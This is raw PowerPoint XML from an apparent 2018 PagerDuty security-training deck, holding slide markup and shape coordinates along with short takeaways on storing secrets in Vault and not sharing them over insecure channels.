              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1276" name="PSEUDOCODE"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20282175" y="5496619"/>
            <a:ext cx="3717419" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="35353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PSEUDOCODE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1277" name="DON’T DO THIS"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="358292"/>
            <a:ext cx="3717419" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C62818"/>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DON’T DO THIS</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1" name="Vault"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Vault</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1282" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12501990" y="616935"/>
            <a:ext cx="10402288" cy="4105608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1283" name="Securely stored secrets (passwords, API keys, etc).…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Securely stored secrets (passwords, API keys, etc).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Easily roll new secrets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Provides audit logging around key access.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1284"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1285"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286" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1287"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91" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="442" t="1213" r="1001" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="322857" y="1068410"/>
            <a:ext cx="23738475" cy="12274308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1294" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="336020" y="10956396"/>
            <a:ext cx="23711960" cy="2776538"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="23711958" cy="2776536"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1292" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1506536"/>
              <a:ext cx="23711959"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353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1293" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="19579" y="0"/>
              <a:ext cx="23672801" cy="1558106"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="16513">
                  <a:srgbClr val="FFFFFF"/>
                </a:gs>
                <a:gs pos="72171">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="50000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:path path="shape">
                <a:fillToRect l="50061" t="105303" r="49938" b="-5303"/>
              </a:path>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200">
                  <a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1295" name="PagerDuty_logo_GREEN.png" descr="PagerDuty_logo_GREEN.png"/>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1296"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297" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1298"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02"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30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304" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1305" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1306" name="Use Vault for storing app secrets."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Use Vault for storing app secrets.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1307" name="KEY TAKEAWAY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C15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KEY TAKEAWAY</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1" name="“I need the password for…”"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>“I need the password for…”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1312" name="PagerDuty_logo_WHITE.png" descr="PagerDuty_logo_WHITE.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313"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314" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1315" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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19"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320"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321" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1322" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323" name="Never share secrets over insecure communication channels."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Never share secrets over insecure communication channels.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1324" name="KEY TAKEAWAY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C15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KEY TAKEAWAY</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28" name="Image" descr="Image"/>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32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330" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1331" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1332" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="103" t="96" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5590500" y="174445"/>
            <a:ext cx="14086563" cy="136071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34" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11398" y="1"/>
                  <a:pt x="11161" y="2"/>
                  <a:pt x="11160" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11152" y="16"/>
                  <a:pt x="11098" y="35"/>
                  <a:pt x="11039" y="45"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10731" y="96"/>
                  <a:pt x="10322" y="371"/>
                  <a:pt x="10180" y="622"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10141" y="690"/>
                  <a:pt x="10089" y="817"/>
                  <a:pt x="10065" y="903"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10020" y="1059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9776" y="1196"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9466" y="1369"/>
                  <a:pt x="9254" y="1548"/>
                  <a:pt x="9086" y="1778"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8838" y="2120"/>
                  <a:pt x="8685" y="2491"/>
                  <a:pt x="8581" y="2994"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8531" y="3233"/>
                  <a:pt x="8521" y="3376"/>
                  <a:pt x="8514" y="3982"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8506" y="4693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8420" y="4734"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8215" y="4834"/>
                  <a:pt x="8183" y="5217"/>
                  <a:pt x="8363" y="5422"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8399" y="5464"/>
                  <a:pt x="8397" y="5487"/>
                  <a:pt x="8348" y="5652"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8318" y="5752"/>
                  <a:pt x="8289" y="5927"/>
                  <a:pt x="8282" y="6041"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8271" y="6233"/>
                  <a:pt x="8261" y="6262"/>
                  <a:pt x="8140" y="6455"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7952" y="6753"/>
                  <a:pt x="7925" y="6813"/>
                  <a:pt x="7977" y="6813"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7991" y="6813"/>
                  <a:pt x="8004" y="6791"/>
                  <a:pt x="8004" y="6765"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8004" y="6702"/>
                  <a:pt x="8245" y="6341"/>
                  <a:pt x="8269" y="6368"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8279" y="6380"/>
                  <a:pt x="8302" y="6438"/>
                  <a:pt x="8321" y="6498"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8339" y="6558"/>
                  <a:pt x="8382" y="6665"/>
                  <a:pt x="8416" y="6736"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8450" y="6807"/>
                  <a:pt x="8469" y="6870"/>
                  <a:pt x="8458" y="6876"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8448" y="6883"/>
                  <a:pt x="8387" y="6889"/>
                  <a:pt x="8324" y="6890"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7990" y="6894"/>
                  <a:pt x="7753" y="7334"/>
                  <a:pt x="7812" y="7838"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7871" y="8340"/>
                  <a:pt x="8145" y="8673"/>
                  <a:pt x="8472" y="8638"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8545" y="8630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8565" y="8903"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8584" y="9142"/>
                  <a:pt x="8580" y="9200"/>
                  <a:pt x="8531" y="9368"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8455" y="9627"/>
                  <a:pt x="8458" y="9612"/>
                  <a:pt x="8428" y="9867"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8398" y="10123"/>
                  <a:pt x="8425" y="10431"/>
                  <a:pt x="8501" y="10685"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8548" y="10844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8317" y="11104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8086" y="11365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7787" y="11398"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7084" y="11476"/>
                  <a:pt x="6299" y="11761"/>
                  <a:pt x="5611" y="12189"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5507" y="12254"/>
                  <a:pt x="5408" y="12306"/>
                  <a:pt x="5391" y="12306"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5374" y="12306"/>
                  <a:pt x="5342" y="12260"/>
                  <a:pt x="5319" y="12204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5243" y="12015"/>
                  <a:pt x="5072" y="11741"/>
                  <a:pt x="4924" y="11571"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4740" y="11361"/>
                  <a:pt x="4392" y="11107"/>
                  <a:pt x="4127" y="10991"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3926" y="10902"/>
                  <a:pt x="3923" y="10902"/>
                  <a:pt x="3463" y="10900"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2941" y="10898"/>
                  <a:pt x="2791" y="10927"/>
                  <a:pt x="2469" y="11090"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2083" y="11286"/>
                  <a:pt x="1855" y="11623"/>
                  <a:pt x="1737" y="12170"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1675" y="12457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1520" y="12548"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1012" y="12845"/>
                  <a:pt x="745" y="13259"/>
                  <a:pt x="638" y="13920"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="610" y="14092"/>
                  <a:pt x="586" y="14151"/>
                  <a:pt x="483" y="14295"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="245" y="14627"/>
                  <a:pt x="30" y="15102"/>
                  <a:pt x="30" y="15296"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30" y="15334"/>
                  <a:pt x="19" y="15372"/>
                  <a:pt x="4" y="15381"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3" y="15382"/>
                  <a:pt x="2" y="15442"/>
                  <a:pt x="0" y="15464"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2" y="15513"/>
                  <a:pt x="3" y="15654"/>
                  <a:pt x="4" y="15655"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="15664"/>
                  <a:pt x="30" y="15699"/>
                  <a:pt x="30" y="15733"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30" y="15851"/>
                  <a:pt x="145" y="16148"/>
                  <a:pt x="258" y="16327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="471" y="16663"/>
                  <a:pt x="905" y="17036"/>
                  <a:pt x="1398" y="17308"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1514" y="17371"/>
                  <a:pt x="1605" y="17451"/>
                  <a:pt x="1696" y="17566"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2058" y="18023"/>
                  <a:pt x="2570" y="18308"/>
                  <a:pt x="3197" y="18403"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3532" y="18454"/>
                  <a:pt x="4239" y="18421"/>
                  <a:pt x="4644" y="18336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5033" y="18254"/>
                  <a:pt x="5478" y="18133"/>
                  <a:pt x="5796" y="18021"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5925" y="17976"/>
                  <a:pt x="6039" y="17944"/>
                  <a:pt x="6051" y="17952"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6062" y="17959"/>
                  <a:pt x="5983" y="18103"/>
                  <a:pt x="5874" y="18272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5293" y="19172"/>
                  <a:pt x="4855" y="20158"/>
                  <a:pt x="4547" y="21261"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4517" y="21368"/>
                  <a:pt x="4492" y="21469"/>
                  <a:pt x="4492" y="21487"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4492" y="21510"/>
                  <a:pt x="6169" y="21519"/>
                  <a:pt x="11053" y="21524"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16536" y="21530"/>
                  <a:pt x="17613" y="21525"/>
                  <a:pt x="17613" y="21494"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17613" y="21333"/>
                  <a:pt x="17191" y="20008"/>
                  <a:pt x="16968" y="19472"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16700" y="18824"/>
                  <a:pt x="16172" y="17879"/>
                  <a:pt x="15858" y="17486"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15774" y="17381"/>
                  <a:pt x="15687" y="17255"/>
                  <a:pt x="15664" y="17206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15627" y="17125"/>
                  <a:pt x="15627" y="17112"/>
                  <a:pt x="15664" y="17073"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15700" y="17035"/>
                  <a:pt x="15716" y="17045"/>
                  <a:pt x="15817" y="17164"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16098" y="17494"/>
                  <a:pt x="17254" y="19409"/>
                  <a:pt x="17946" y="20690"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18132" y="21034"/>
                  <a:pt x="18163" y="21078"/>
                  <a:pt x="18230" y="21086"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18290" y="21093"/>
                  <a:pt x="18312" y="21114"/>
                  <a:pt x="18339" y="21198"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18358" y="21255"/>
                  <a:pt x="18394" y="21326"/>
                  <a:pt x="18418" y="21354"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18443" y="21382"/>
                  <a:pt x="18456" y="21417"/>
                  <a:pt x="18447" y="21432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18438" y="21447"/>
                  <a:pt x="18443" y="21490"/>
                  <a:pt x="18457" y="21529"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18483" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="21520"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="21476"/>
                  <a:pt x="21588" y="21432"/>
                  <a:pt x="21575" y="21424"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21562" y="21415"/>
                  <a:pt x="21543" y="21368"/>
                  <a:pt x="21533" y="21320"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21497" y="21150"/>
                  <a:pt x="21372" y="20872"/>
                  <a:pt x="21240" y="20670"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21106" y="20465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21155" y="20383"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21215" y="20282"/>
                  <a:pt x="21217" y="20183"/>
                  <a:pt x="21161" y="20100"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21139" y="20067"/>
                  <a:pt x="21133" y="20048"/>
                  <a:pt x="21137" y="20027"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21137" y="20025"/>
                  <a:pt x="21140" y="20023"/>
                  <a:pt x="21141" y="20021"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21145" y="20005"/>
                  <a:pt x="21152" y="19989"/>
                  <a:pt x="21174" y="19958"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21205" y="19915"/>
                  <a:pt x="21231" y="19861"/>
                  <a:pt x="21231" y="19837"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21231" y="19814"/>
                  <a:pt x="21157" y="19608"/>
                  <a:pt x="21068" y="19379"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20339" y="17502"/>
                  <a:pt x="19230" y="15483"/>
                  <a:pt x="18053" y="13891"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16844" y="12255"/>
                  <a:pt x="15721" y="11469"/>
                  <a:pt x="14622" y="11490"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14337" y="11496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14223" y="11348"/>
                </a:lnTo>
                <a:cubicBezTo>
